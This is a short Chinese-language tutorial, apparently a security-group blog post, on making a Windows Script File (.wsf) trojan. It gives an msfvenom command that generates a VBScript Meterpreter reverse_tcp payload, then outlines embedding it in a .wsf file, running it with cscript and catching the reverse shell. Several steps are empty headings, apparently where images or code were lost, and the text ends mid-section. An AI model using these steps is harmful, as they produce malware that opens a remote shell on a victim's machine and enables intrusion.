msf 生成.wsf 木马

本文由玄魂工作室--安全群 嘉宾“江河” 提供。

前天在群里问了如何生成.wsf msf马,今天写出了实例,分享出来,同时期待亮神的佳作。

首先了解wsf是啥语言，可参考文章如下：

wsf脚本语言是Windows 脚本文件，是含有可扩展标记语言 (XML)，支持javascript和vbs,

Include 语句将函数从 VBScript 或 JScript 文件合并到 Windows 脚本宿主项目中。

wsf后门思路：

1）学习.wsf脚本格式

2）msf生成vbs

3) msf生成vbs插入.wsf脚本格式

4）尝试运行查看是否报错

5）反弹shell

开始制作脚本：

1） .wsf脚本格式

2） msf生成vbs

msfvenom -pwindows/meterpreter/reverse_tcp LHOST= lport=  EXITFUNC=thread -f vbs--platform win > test.vbs

3） msf生成vbs插入.wsf脚本中

4）尝试运行无查看是否报错：

直接运行无报错

使用cscript.exe (WindowsScript Host引擎),运行无报错:

5）反弹shell

监听：

反弹：

知识补充：